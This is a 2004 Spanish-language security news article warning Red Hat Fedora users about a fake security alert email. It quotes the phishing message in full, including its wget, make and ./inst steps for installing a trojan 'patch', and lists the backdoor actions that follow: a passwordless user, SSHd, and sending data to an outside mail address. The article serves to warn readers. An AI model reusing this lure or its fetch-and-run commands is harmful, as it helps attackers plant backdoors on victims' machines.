usuario
clave
iniciar sesión
regístrate
Portada
Canales
  • Apple
  • Blackhats
  • Ciencia
  • Comunicación
  • Curiosidades
  • e-Administración
  • Empresas
  • Eventos
  • Hardware
  • Nombramientos
  • Seguridad
  • Software
  • Software Libre
  • Telefonía
  • Videojuegos
  • Wireless
El Periódico
  • Blogs
  • Editorial
  • Entrevistas
  • Gadgets
  • Perfiles
  • Tags
  • Top noticias
  • Videorreportajes
  • Webcómics
Servicios
  • Boletines
  • Contactos
  • Empleo
  • Formación
  • Minijuegos
  • Tienda
  • Viviendas
Comunidad
  • Encuestas
  • Foros
  • Emails de los lectores
Viviendas
Acción:
Propiedad:
Provincia:

Patrocinado por:
Tienda
Boletín semanal
Email:
Boletines publicados
  • Seguridad
  • Noticias
Otras noticias
  • Los ciberdelincuentes están desarrollando herramientas para probar sus creaciones antes de distribuirlas
  • ¡Peligro! Aparece el gusano Zafi.B
  • Nueva actualización de seguridad del kernel 2.6 de Linux
  • Ejecución de código a través de archivos TIFF en OpenOffice.org
  • La nueva web del Congreso de los Diputados tiene varios fallos de seguridad
  • Aumentan los troyanos en la red
  • Múltiples vulnerabilidades en Mozilla Firefox, Thunderbird y SeaMonkey
  • Ruptura del cifrado Enigma de cuatro rotores
  • América analiza esta semana la situación de su seguridad informática
  • Desbordamiento de buffer en PuTTY
Más noticias
En el foro
  • ¿Qué antivirus usas?
  • ¿Alguna vez se te ha infectado el ordenador?
  • ¿Son las empresas que fabrican antivirus las responsables de los virus?
  • Un problema
  • Seguridad en Centrales Hidroelectricas
Ir al foro de Seguridad
trampa

Falso mensaje de alerta a usuarios de Red Hat Fedora

Un mensaje falso que pretende ser enviado por Red Hat Security Team, ha estado circulando por Internet. El texto invita a los usuarios de Red Hat Fedora Linux, a descargar e instalar actualizaciones maliciosas, que pretenden comprometer la seguridad de sus equipos.

28 Oct 2004 | ENCICLOPEDIA VIRUS
 

El mensaje contiene el siguiente texto:

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to  execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT ed. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Again, please apply this patch as soon as possible or you risk your system and others to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Cuando el usuario descarga y ejecuta este parche, el troyano puede realizar las siguientes acciones:

1. Crear un usuario "bash" sin contraseña

2. Capturar la dirección IP y la hora de ejecución

3. Ejecutar SSHd

4. Enviar esta información a la dirección "root@addlebrain .com"


Más información:

Fedora-Redhat Fake Security Alert / Trojan Source Code & Analysis
http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt

Boletín

Si quieres recibir cada semana las noticias más interesantes suscríbete a nuestro boletín.

Comentarios
LaFlecha.net no se hace responsable del contenido de los comentarios publicados.
Entérate de cuándo hay nuevos comentarios

No se permitirán los comentarios que :
- puedan resultar ofensivos o injuriosos
- incluyan insultos, alusiones sexuales innecesarias y palabras soeces o vulgares
- apoyen la pedofilia, el terrorismo o la xenofobia

Autor
Comentario
BBCode (Ayuda): [b], [i], [quote], [code]
Publicidad
Ahora en LaFlecha puedes encontrar cursos y másters



  • Acerca de LaFlecha
  • Contactar
  • Política de privacidad
  • RSS/RDF
  • Registro de Dominios
    Alojamiento Web
    Servidores Dedicados
    Buscador de Empresas
  • Pixmania
  • Alojamiento web
  • Eventos Barcelona
  • Alojamiento Web
  • Alquiler Limusinas
  • Fotografos Bodas
  • Casino Online
  • ¿Quieres saberlo todo sobre Hacking?